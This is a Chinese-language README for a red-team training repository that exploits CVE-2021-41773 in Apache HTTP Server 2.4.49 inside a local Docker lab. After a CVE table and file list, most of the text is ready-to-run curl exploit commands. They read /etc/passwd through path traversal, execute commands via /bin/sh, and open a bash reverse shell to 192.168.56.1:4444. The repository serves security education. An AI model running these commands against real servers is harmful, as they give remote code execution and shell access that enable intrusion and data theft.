ITSOLERA 网络安全部门 — 红队任务 #3
团队: Offensive Team Zeta
日期: 2026年3月18日
本仓库仅用于教育目的。
所有测试均在隔离的本地 Docker 实验环境中执行。
切勿用于在线、生产或第三方系统。
| 字段 | 详情 |
|---|---|
| CVE ID | CVE-2021-41773 |
| CVSS | 9.8 严重 |
| 受影响版本 | 仅 Apache HTTP Server 2.4.49 |
| 类型 | 路径遍历 + 远程代码执行 |
| 修复版本 | Apache 2.4.51 |
| 文件 | 说明 |
|---|---|
poc_41773.py | 带有 Team Zeta 横幅的 Python PoC 利用脚本 |
docker-compose.yml | 漏洞实验环境配置 |
offensive_zeta_shell.txt | 实时会话日志 — 利用验证 |
screenshots/ | 证据截图 |
Offensive_Team_Zeta_FINAL_Report.pdf | 完整利用报告 |
# 拉取存在漏洞的镜像
sudo docker pull blueteamsteve/cve-2021-41773:with-cgid
# 启动实验环境
docker-compose up -d
# 验证 Apache 2.4.49 是否运行
curl -I http://localhost:8080/
# 应显示: Server: Apache/2.4.49
# 通过路径遍历读取文件
curl --path-as-is \
'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'
# 远程代码执行
curl --path-as-is \
-d 'echo Content-Type: text/plain; echo; id' \
'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
# 反弹 Shell(将 IP 替换为你本机的 IP)
curl --path-as-is \
-d "echo Content-Type: text/plain; echo; bash -c 'bash -i >& /dev/tcp/192.168.56.1/4444 0>&1'" \
"http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"